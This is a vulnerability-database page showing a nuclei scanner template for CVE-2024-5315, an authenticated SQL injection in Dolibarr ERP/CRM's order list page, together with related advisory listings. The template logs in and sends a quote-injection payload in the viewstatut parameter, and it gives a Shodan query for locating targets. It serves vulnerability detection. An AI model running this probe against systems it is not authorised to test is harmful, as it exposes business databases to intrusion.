Lucene search
K

Dolibarr ERP CMS `list.php` - SQL Injection

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 40 Views

Dolibarr ERP CMS `list.php` SQL Injection - version 9.0.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
Dolibarr ERP/CRM SQL注入漏洞
24 May 202400:00
cnnvd
CVE
CVE-2024-5315
24 May 202410:06
cve
Cvelist
CVE-2024-5315 Multiple vulnerabilities in DOLIBARR's ERP CMS
24 May 202410:06
cvelist
Github Security Blog
Dolibarr vulnerable to SQL Injection
24 May 202414:53
github
NVD
CVE-2024-5315
24 May 202410:15
nvd
OSV
BIT-DOLIBARR-2024-5315 Multiple vulnerabilities in DOLIBARR's ERP CMS
3 Apr 202514:07
osv
OSV
GHSA-Q8X7-JC3H-P8XC Dolibarr vulnerable to SQL Injection
24 May 202414:53
osv
OSV
UBUNTU-CVE-2024-5315
24 May 202410:15
osv
Positive Technologies
PT-2024-35608 · Unknown · Dolibarr Erp/Crm
24 May 202400:00
ptsecurity
RedhatCVE
CVE-2024-5315
5 Feb 202506:24
redhatcve
Rows per page
id: CVE-2024-5315

info:
  name: Dolibarr ERP CMS `list.php` - SQL Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters viewstatut in /dolibarr/commande/list.php
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5315
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-5315
    cwe-id: CWE-89
    epss-score: 0.32872
    epss-percentile: 0.98148
    cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Dolibarr"
    product: dolibarr_erp\\/crm
    vendor: dolibarr
  tags: cve,cve2024,dolibarr,erp,sqli,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /htdocs/index.php?mainmenu=home HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginfunction=loginfunction&username={{username}}&password={{password}}

      - |
        GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - You have an error in your SQL syntax

      - type: word
        part: header_1
        words:
          - 'Set-Cookie: DOLSESSID_'

      - type: word
        part: body_1
        words:
          - SuperAdmin
# digest: 4a0a00473045022040f004e865cf3c1f57552400feedb83b3646f2dbfbabd1bedd84fc7f17749045022100c058aad6cbeef794f18a982e9b2582785a579d331f52ffa8cd836c04acd8b09b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.1
EPSS0.32872
SSVC
40